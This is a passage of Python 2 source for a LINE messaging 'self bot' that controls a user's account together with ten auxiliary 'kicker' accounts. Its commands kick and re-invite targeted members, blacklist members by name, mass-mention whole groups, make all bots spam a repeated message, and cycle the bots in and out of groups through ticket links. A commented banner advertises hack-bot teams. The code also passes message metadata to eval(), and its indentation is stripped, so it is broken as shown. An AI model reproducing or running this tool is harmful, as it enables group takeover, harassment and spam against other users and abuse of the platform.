elif msg.text in ["Bot2 invite contact","2เชิญ"]:
if msg.from_ in admin:
wait["binvite"] = True
ki2.sendText(msg.to,"send contact")
elif ("Ktc " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
cl.inviteIntoGroup(msg.to,[target])
cl.cancelGroupInvitation(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif '123zzz' in msg.text.lower():
key = msg.text[-33:]
cl.findAndAddContactsByMid(key)
cl.inviteIntoGroup(msg.to, [key])
contact = cl.getContact(key)
elif msg.text in ["ยกเลิก"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["mybotยกเลิก"]:
if msg.toType == 2:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7]
kicker = random.choice(klist)
G = kicker.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
kicker.sendText(msg.to,"No one is inviting")
else:
kicker.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
kicker.sendText(msg.to,"Can not be used outside the group")
else:
kicker.sendText(msg.to,"Not for use less than group")
elif msg.text in ["#Link on"]:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Open link"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"อนุญาติ ให้มีการเชิญ\nด้วยลิ้งแล้ว👌")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["close link"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดการเชิญ\nด้วยลิ้งแล้ว👌")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text.lower() == 'ginfo':
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[Nama]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nAnggota:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
elif msg.text in ["!Glist","Myginfo"]:
gs = cl.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["DPK🐲BOT"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
cl.sendText(msg.to,"[DPK🐲BOT\nBy:☬ARIFISTIFIK☬]")
elif "Key" == msg.text:
key = msg.to
cl.sendText(msg.to, key)
elif ("Hack " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif "Mid:" in msg.text:
mmid = msg.text.replace("Mid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
# elif "Phet Keyy" in msg.text:
# cl.sendText(msg.to,""" [{PHET HACK BOT}] \n\n key Only Kicker #\n\n[Kb1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Pb1 Gift]\n[Pb1 bye]\n\n
#❦❧〖฿❂Ŧ〗☞ᵀËÄM ທஇລ❂ق B❂T✓
#❦❧ ᵀËÄM ℓℓπ้ी૪ B❂T ✓
#❦❧ ᵀËÄM ທஇລ❂قB❂T ✓
#☠Ҝŋ β☢ȶȶ ƿℓαÿєᴿ☠
#✍ Ŧ€₳M ж Ħ₳ʗҜ฿❂Ŧ ✈
#Ŧ€₳M ✍ ທஇລ❂قীள้௭ิњ ✈
#☢Ŧ€₳M≈ನန้ণএ≈฿❂Ŧ☢
#・⋆ ざঝণのঝ ⋆ ・
#♤ のю४ণধபӘທ ♤
#🇹?? ฿ΘŧŧĽÎη℮Ŧђάίłάήđ 🇹🇭
#[By.🐯 हईທຮຮๅજईह 🐯]
#[By.β•`BF.บั้ม•`]
#[By.Gυ Tєʌм HʌcκBoт]
#[By.❦〖Ᵽɧëȶ〗☞ᵀËÄM ທஇລ❂ق B❂T✓]
#""")
elif msg.text.lower() == 'ยกเลิก1':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
elif msg.text.lower() == 'mybotยกเลิก1':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki1.cancelGroupInvitation(msg.to,[_mid])
ki1.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
cl.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
elif "ct @" in msg.text:
msg.contentType = 13
_name = msg.text.replace("ct @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif "#cb" in msg.text:
nk0 = msg.text.replace("#cb","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"😏")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"😏")
except:
cl.sendText(msg.to,"😏")
elif "แบนหมด" in msg.text:
nk0 = msg.text.replace("แบนหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "ลบแบน ทั้งหมด" in msg.text:
nk0 = msg.text.replace("ลบแบน ทั้งหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Mid" == msg.text:
cl.sendText(msg.to,mid)
elif msg.text == "Group":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "GROUPCREATOR"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "[ปิด]"
else:
u = "[เปิด]"
cl.sendText(msg.to,"[ชื่อของกลุ่ม]:\n" + str(ginfo.name) + "\n[Gid]:\n" + msg.to + "\n[Group creator:]\n" + gCreator + "\n[ลิ้งค์รูปกลุ่ม]:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n[จำนวนสมาชิก]:" + str(len(ginfo.members)) + "คน\n[จำนวนค้างเชิญ]:" + sinvitee + "คน\n[สถานะลิ้งค์]:" + u + "URL\n[By: ☬ARIFISTIFIK☬]")
else:
cl.sendText(msg.to,"Nama Gourp:\n" + str(ginfo.name) + "\nGid:\n" + msg.to + "\nCreator:\n" + gCreator + "\nProfile:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Bot1@@" in msg.text:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*200 : (j+1)*200]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
ki1.sendMessage(msg)
elif msg.text in ["Bot?","absen"]:
ki1.sendText(msg.to,"😈kickเกอร๋.1 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki2.sendText(msg.to,"😈kickเกอร์.2 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki3.sendText(msg.to,"😈kickเกอร์.3 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki4.sendText(msg.to,"😈kickเกอร์.4 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki5.sendText(msg.to,"😈kickเกอร์.5 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki6.sendText(msg.to,"😈kickเกอร์.6 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki7.sendText(msg.to,"😈kickเกอร์.7 รายงานต้ว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki8.sendText(msg.to,"😈kickเกอร์.8 รายงานตีว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki9.sendText(msg.to,"😈kickเกอร์.9 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki10.sendText(msg.to,"😈kickเกอร์.10 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
elif "/say " in msg.text:
bctxt = msg.text.replace("/say ","")
ki1.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki6.sendText(msg.to,(bctxt))
ki7.sendText(msg.to,(bctxt))
ki8.sendText(msg.to,(bctxt))
ki9.sendText(msg.to,(bctxt))
ki10.sendText(msg.to,(bctxt))
elif "All mid" == msg.text:
ki1.sendText(msg.to,Amid1)
ki2.sendText(msg.to,Amid2)
ki3.sendText(msg.to,Amid3)
ki4.sendText(msg.to,Amid4)
ki5.sendText(msg.to,Amid5)
ki6.sendText(msg.to,Amid6)
ki7.sendText(msg.to,Amid7)
ki8.sendText(msg.to,Amid8)
ki9.sendText(msg.to,Amid9)
ki10.sendText(msg.to,Amid10)
elif msg.text in ["Protect:on","Protect on","เปิดป้องกัน"]:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Qr:off","Qr off"]:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Qr:on","Qr on"]:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:off","Protect off","ปิดป้องกัน"]:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "เปิด ล็อคชื่อ" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ล็อคชื่อ สำเร็จ.👌..")
else:
cl.sendText(msg.to,"bone..")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "ปิด ล็อคชื่อ" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ปิด ล็อคชื่อแล้ว.👌.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"bone..")
elif "cancal on" == msg.text:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ปิดการเชิญเข้ากลุ่ม\nของสมาชิกแล้ว.👌.")
elif "cancal off" == msg.text:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"เปิด ให้สมาชิกทุกคน\nสามรถเชิญเพื่อนได้.👌.")
except:
pass
elif "Cn: " in msg.text:
string = msg.text.replace("Cn: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Name " + string + " Done Bosqu")
elif msg.text in ["invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif "Mc " in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Mc: " in msg.text:
mmid = msg.text.replace("Mc: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
ki1.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
ki6.sendMessage(msg)
ki7.sendMessage(msg)
ki8.sendMessage(msg)
ki9.sendMessage(msg)
ki10.sendMessage(msg)
elif msg.text in ["K on","clubContact on","K:on"]:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["contact v"]:
if msg.from_ in admin:
wait["winvite"] = True
random.choice(KAC).sendText(msg.to,"send contact")
elif msg.text in ["K:off","ปิด คท","Contact off","K off"]:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["Auto join on","Join on","Join:on","open group","Poin on"]:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["Join off","Auto join off","closed group","Join:off","Poin off"]:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif "Gcancel:" in msg.text:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave:on","Auto leave on","เleave on","Leave on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Leave:off","Auto leave off","leave off","Leave off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["share on","Share on","Share:on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["share off","Share off","Share:off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了关断。")
elif msg.text in ["Like on","เปิด ไลค์"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดอยู่แล้ว。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบออโต้ไลค์.👌")
elif msg.text in ["ปิด ไลค์","Like off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดอยู่แล้ว")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบออโต้ไลค์.👌")
#========================================
#========================================
elif msg.text in ["เชคค่า","เช็คค่า","Set"]:
print "Setting pick up..."
md = "SELF BOT\nBy:☬ARIFISTIFIK☬\n\n"
if wait["likeOn"] == True: md+=" ออโต้ไลค์ : ✔ \n"
else:md+=" ออโต้ไลค์ : ❌ \n"
if wait["alwayRead"] == True: md+=" อ่าน : ✔ ??\n"
else:md+=" อ่าน : ❌ \n"
if wait["detectMention"] == True: md+=" ตอบแทค : ✔ \n"
else:md+=" ตอบแทค : ❌ \n"
if wait["kickMention"] == True: md+=" ออโต้เตะ: ✔ \n"
else:md+=" ออโต้เตะ : ❌ \n"
if wait["Notifed"] == True: md+=" Notifed : ✔ \n"
else:md+=" Notifed : ❌ \n"
if wait["Notifedbot"] == True: md+=" Notifedbot : ✔ \n"
else:md+=" Notifedbot : ❌ \n"
if wait["acommentOn"] == True: md+=" Hhx1 : ✔ \n"
else:md+=" Hhx1 : ❌ \n"
if wait["bcommentOn"] == True: md+=" Hhx2 : ✔ \n"
else:md+=" Hhx2 : ❌ \n"
if wait["ccommentOn"] == True: md+=" Hhx3 : ✔ \n"
else:md+=" Hhx3 : ❌ \n"
if wait["Protectcancl"] == True: md+=" Cancel : ✔ \n"
else:md+=" Cancel : ❌ \n"
if wait["winvite"] == True: md+=" Invite: ✔ \n"
else:md+=" Invite : ❌ \n"
if wait["pname"] == True: md+=" ล็อคชื่อ : ✔ \n"
else:md+=" ล็อคชื่อ : ❌ \n"
if wait["contact"] == True: md+=" Contact : ✔ \n"
else: md+=" Contact : ❌ \n"
if wait["autoJoin"] == True: md+=" ออโต้เข้ากลุ่ม : ✔ \n"
else: md +=" ออโต้เข้ากลุ่ม : ❌ \n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + " \n"
else: md+= " Group cancel : ❌ \n"
if wait["leaveRoom"] == True: md+=" ออโต้ ออกแชท : ✔ \n"
else: md+=" ออโต้ ออกแชท: ❌ \n"
if wait["timeline"] == True: md+=" ออโต้ แชร์ : ✔ \n"
else:md+=" ออโต้ แชร์ : ❌ \n"
if wait["clock"] == True: md+=" ชื่อ นาฬิกา : ✔ \n"
else:md+=" ชื่อ นาฬิกา : ❌ \n"
if wait["autoAdd"] == True: md+=" ออโต้ เพิ่มเพื่อน : ✔ \n"
else:md+=" ออโต้ เพิ่มเพื่อน : ❌ \n"
if wait["commentOn"] == True: md+=" ออโต้ comment : ✔ \n"
else:md+=" ออโต้ comment : ❌ \n"
if wait["Backup"] == True: md+=" ดึงกลับ : ✔ \n"
else:md+=" ดึงกลับ : ❌ \n"
if wait["qr"] == True: md+=" ป้องกัน QR : ✔ \n"
else:md+=" ป้องกัน QR : ❌ \n"
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
#========================================
elif msg.text in ["Restart","รีบูต"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "เชลmybot ได้รีสตาร์ตแล้ว.👌\nกรุณาตั้งค่าใหม่อีกครั้ง.👈")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#========================================
elif msg.text.lower() == 'muter':
if msg.toType == 2:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"waitting...")
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
# ki10.leaveGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
# ki10.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
# ki10.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
